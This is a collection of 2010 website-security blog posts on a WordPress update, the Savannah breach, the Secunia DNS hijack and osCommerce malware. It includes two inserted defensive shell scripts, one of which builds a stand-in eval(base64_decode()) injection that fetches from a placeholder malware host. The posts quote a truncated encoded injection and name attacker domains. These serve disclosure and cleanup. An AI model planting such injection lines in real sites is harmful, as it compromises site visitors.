WordPress 3.0.2 released (security update)

If you’re using WordPress, make sure to update to the latest version (3.0.2) as soon as possible, especially if you have multiple authors with access to your blog/site.

Details about the security issue fixed:

This maintenance release fixes a moderate security issue that could allow a malicious Author-level user to gain further access to the site, addresses a handful of bugs, and provides some additional security enhancements. Big thanks to Vladimir Kolesnikov for detailed and responsible disclosure of the security issue!

The changes between 3.0.1 and 3.0.2 are pretty small and only these files were modified:

wp-admin/includes/file.php
wp-admin/includes/plugin.php
wp-admin/includes/update-core.php
wp-admin/plugins.php

wp-includes/canonical.php
wp-includes/capabilities.php
wp-includes/comment.php
wp-includes/functions.php
wp-includes/load.php
wp-includes/ms-files.php
wp-includes/version.php

Savannah.gnu.org hacked and currently offline

We’ve learned that savannah.gnu.org (used as a central code repository for many GNU projects – gcc, etc.) has been hacked and is currently offline. They posted some details on their site explaining what is going on: savannah.gnu.org

Savannah is currently down – details to follow.

There’s been a SQL injection leading to leaking of encrypted account passwords, some of them discovered by brute-force attack, leading in turn to project membership access.
We’re reinstalling the system and restoring the data from a safe backup, November 23rd circa 12:00 GMT.
Please prepare to recommit your changes since that date.
While effort was made in the past to fix injection vulnerabilities in the Savane2 legacy codebase, it appears this was not enough :/

No firm ETA for the return online yet (but during the week).

* 2010/11/29 21:30 GMT: access to the base host restored, extracting incremental backup from the 23rd
* 2010/11/29 23:30 GMT: finished diagnosing original attack
* 2010/11/30 12:30 GMT: data transfers in progress
* 2010/11/30 13:30 GMT: read-only access to source repositories
* 2010/11/30 14:30 GMT: write access to source repositories
* 2010/11/30 16:30 GMT: data transfers finished
* 2010/11/30 18:00 GMT: access to downloads and GNU Arch

What we’ve learned is the attackers exploited a SQL injection vulnerability, got access to all passwords and probably access to some projects through the exploit. If you have an account at Savannah (and like to re-use passwords), change them as soon as possible.

Yet Another WordPress Security Post – Part One

At the end of October we had the opportunity to attend WordCamp Las Vegas. WordCamps are great events organized in various cities/countries by the WordPress community to discuss, learn, and teach all things WordPress. If you’ve never attended one, I highly recommend you do! More than likely, there is already an event near you.

Yet Another WordPress Security Post

John Hawkins, one of the WordCamp Las Vegas organizers, asked if I’d be interested in standing in on a Q&A session after lunch; he said he had some questions for me. Of course I obliged, and we headed off to lunch.

Lunch was great. We then gathered in the main conference hall to field questions. As moderator, when John had an opportunity, he fired off the following question at me:

“What best practices do you recommend be used to secure a WordPress install?”

Secunia defaced? DNS hijacked?

Secunia is a very popular security company, specialized in vulnerability intelligence, security management, and things like that.

However, yesterday evening, everyone visiting their site received a special “defaced” message (“System down – get babana, hacked by turkguvenligi”):

Secunia defaced

What happened? Did their web servers get hacked?

No, their servers were not hacked. After some analysis, it seems that their DNS was hijacked to point to another location. The first sign of that is that their Whois record was modified yesterday:

Record last updated 11-24-2010 06:49:51 PM
Record expires on 08-16-2017
Record created on 08-16-2002

Domain servers in listed order:
A.NS.SECUNIA.COM 213.150.41.253
B.NS.SECUNIA.COM 213.150.41.254
C.NS.SECUNIA.COM 91.198.117.1
D.NS.SECUNIA.COM 91.198.117.2


osCommerce attacks and nt07.in, nt06.in, etc

We posted yesterday about a series of attacks against osCommerce sites using some Russian domains to push the malware (generally fake AV). We also posted details on how to fix and secure osCommerce to protect against those:

http://blog.sucuri.net/2010/11/continuing-attacks-against-oscommerce-sites.html

However, they are not the only ones targeting osCommerce. There is another group using many .in web sites (always registered by Jennifer Hook – veriandjsad@comcast.net) that are infecting thousands of sites too.

When they detect a vulnerable site (see the previous post for details on that), they drop a backdoor, generally named google*.php, that allows them to manage the site remotely. You can see the full backdoor here (caught by our honeypots):

http://sucuri.net/?page=tools&title=blacklist&detail=1205dd32a1004a65ecc4d4441474217d

It is interesting that, in addition to giving the attackers full shell access, it also fetches http://redserver.com.ua/code.txt to read the list of domains to use in the attack. Currently, these are the ones being used:

Continuing attacks against osCommerce sites

We are seeing an increase in the number of osCommerce sites hacked lately, and we recommend that anyone using it take precautions to avoid getting hacked and/or reinfected.

On most of the sites we’ve analyzed so far, the attackers used the file_manager.php vulnerability to hack the site.

If you’re using osCommerce, the first thing to do is install the latest version. Second, remove the file_manager.php file and then rename your admin directory to something else; log in via FTP or SSH (recommended) to do so:

ftp> delete admin/file_manager.php
ftp> rename admin admin-random-folder-name
ftp> cd admin-random-folder-name/includes
ftp> get configure.php

Once you do that, modify your configure.php to point the admin folder to the new location.
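The same three steps the FTP session above performs, scripted for a shell session on the server, as an added example that is not part of the original post. It assumes the stock osCommerce layout in which admin/includes/configure.php defines DIR_WS_ADMIN and DIR_FS_ADMIN with paths ending in /admin/; the sample catalog, the random directory name and the two helper function names (harden_oscommerce_admin, admin_is_hardened) are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the Sucuri post): delete file_manager.php, rename
# the admin directory to an unguessable name, and rewrite the admin path
# constants in configure.php. Assumes DIR_WS_ADMIN / DIR_FS_ADMIN end in
# "/admin/" as in a stock osCommerce 2.2 install (labelled assumption).
set -eu

harden_oscommerce_admin() {
    catalog="$1"
    newname="$2"
    rm -f "$catalog/admin/file_manager.php"        # step 1: remove the vulnerable file
    mv "$catalog/admin" "$catalog/$newname"        # step 2: rename the admin directory
    cfg="$catalog/$newname/includes/configure.php"
    # step 3: point the two admin path constants at the new directory; the
    # catalog constants (DIR_WS_CATALOG, DIR_FS_CATALOG) are left untouched.
    sed -e "/DIR_WS_ADMIN/s#/admin/#/$newname/#" \
        -e "/DIR_FS_ADMIN/s#/admin/#/$newname/#" "$cfg" > "$cfg.tmp"
    mv "$cfg.tmp" "$cfg"
}

# Post-check: succeeds only when the old admin/ path is gone, file_manager.php
# no longer exists under the new name, and configure.php references it.
admin_is_hardened() {
    catalog="$1"
    newname="$2"
    [ ! -e "$catalog/admin" ] &&
    [ ! -e "$catalog/$newname/file_manager.php" ] &&
    grep -q "DIR_WS_ADMIN'.*/$newname/'" "$catalog/$newname/includes/configure.php"
}

# Constructed sample catalog so the script runs offline; a real configure.php
# carries many more defines, but the two admin constants look like these.
CATALOG="$(mktemp -d)/catalog"
mkdir -p "$CATALOG/admin/includes"
printf 'constructed stand-in for file_manager.php\n' > "$CATALOG/admin/file_manager.php"
cat > "$CATALOG/admin/includes/configure.php" <<'EOF'
<?php
  define('HTTP_SERVER', 'http://www.example.com');
  define('DIR_WS_ADMIN', '/catalog/admin/');
  define('DIR_WS_CATALOG', '/catalog/');
  define('DIR_FS_ADMIN', '/var/www/catalog/admin/');
  define('DIR_FS_CATALOG', '/var/www/catalog/');
?>
EOF

# Random suffix rather than a predictable name such as "admin2".
NEWNAME="admin-$(od -An -N4 -tx1 /dev/urandom | tr -d ' \n')"
harden_oscommerce_admin "$CATALOG" "$NEWNAME"
admin_is_hardened "$CATALOG" "$NEWNAME" && echo "admin moved to $NEWNAME; file_manager.php removed"
```

Run it with the catalog path of a real install substituted for the constructed one; the sed expressions only touch lines naming the two admin constants, so verify the result with the post-check before logging out of the old admin URL.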

Google blacklist – No way to request a review for the last two days

We have been seeing a big issue on Google for the last few days. Whenever a site got blacklisted, you had the option to request a review after the site was cleaned. Something like this:

Request blacklist review Google

Malware update: inininininininin.in (and oscommerce)

Quick malware update: We are seeing many osCommerce sites infected with malware managed by inininininininin.in, comcomcomcomcomcom.com and a few others. All the domains involved are hosted at 91.204.48.45.

These domains were registered by myid37@gmail.com, which is also involved in other malicious activities (serials-keys.com, wincrack.org, search-crack.org, etc.).

The infected sites had a large encoded entry added to the file includes/header.php:

echo(base64_decode(“ZnVuY3Rpb24gczM3KCRzKXtmb3IgKCRhID0gMDsgJGEgPD…

When decoded, it calls http://inininininininin.in/in.php to fetch the malware to present to the end user:
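An added triage helper, not from the original post, for the pattern described above: it lists the PHP files under a web root that call base64_decode() on a long inline literal (the shape of the header.php injection, whether wrapped in echo() or eval()) and decodes the first such literal so a responder can see what it contains. The web root, the header.php contents and the payload are constructed stand-ins, not the code seen on the infected sites; the helper assumes a grep that supports --include and a base64(1) that accepts -d.

```shell
#!/bin/sh
# Added example (not from the Sucuri post): find PHP files carrying a long
# base64 literal fed to base64_decode(), and decode it for inspection.
set -eu

# Length floor for the literal: legitimate code rarely embeds hundreds of
# bytes of base64 inline, so short strings (tokens, icons) are not flagged.
MIN_LEN=60

# Print, sorted, the *.php files under $1 containing base64_decode("<long literal>").
find_encoded_injections() {
    dir="$1"
    grep -rlE --include='*.php' \
        "base64_decode\(['\"][A-Za-z0-9+/=]{$MIN_LEN,}" "$dir" | sort
}

# Decode the first long literal in file $1 (analysis only; nothing is executed).
decode_first_literal() {
    grep -oE "base64_decode\(['\"][A-Za-z0-9+/=]{$MIN_LEN,}" "$1" | head -n 1 \
        | sed -e "s/^base64_decode(['\"]//" | base64 -d
}

# Constructed sample web root. The payload is a stand-in with the same shape
# as the injection described in the post (encoded PHP that pulls content from
# a remote URL); the host name is a placeholder, not a real indicator.
WEBROOT="$(mktemp -d)"
mkdir -p "$WEBROOT/includes"
PAYLOAD='echo file_get_contents("http://malware.example.invalid/in.php");'
ENCODED="$(printf '%s' "$PAYLOAD" | base64 | tr -d '\n')"
printf '<?php\n// constructed sample of an injected header.php\neval(base64_decode("%s"));\n?>\n' \
    "$ENCODED" > "$WEBROOT/includes/header.php"
# A clean file with a short base64 string must not be reported.
printf '<?php $greeting = base64_decode("aGVsbG8="); ?>\n' > "$WEBROOT/includes/footer.php"

echo "files with long encoded literals:"
find_encoded_injections "$WEBROOT"
echo "decoded first literal from header.php:"
decode_first_literal "$WEBROOT/includes/header.php"
echo
```

Point find_encoded_injections at a real document root to get a list of files to inspect; decoding shows the callback host, which is the indicator to block and to search for in other files and in web logs. A hit is a lead, not a verdict: some plugins legitimately embed encoded data, so read the decoded output before removing anything.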

Alexa top sites – Blacklist for October

Every month we analyze Alexa’s TOP 1 million site ranking and correlate that data with Google’s blacklist. Our goal is to get an overall view of the sites that are getting hacked, blacklisted, etc.

For OCT-2010, the numbers are pretty standard and similar to previous months. Out of those top 1 million sites, around 3.6 thousand were blacklisted last month (3,683 to be exact). Out of the top 100k, more than 408 were blacklisted by Google.

Over time, only 711 of the sites blacklisted in previous months are still blacklisted and still in the TOP 1 million ranking.

Those are the top 100 sites that got flagged and their respective ranking (You can get the full list here):

One interesting point is that more than 70% of the legitimate sites that got hacked were running outdated software (Joomla, WordPress, OpenX, etc.). If you are a site owner, this is a reminder to keep your site updated.

We will post more details in future posts. If you have any questions or comments, let us know.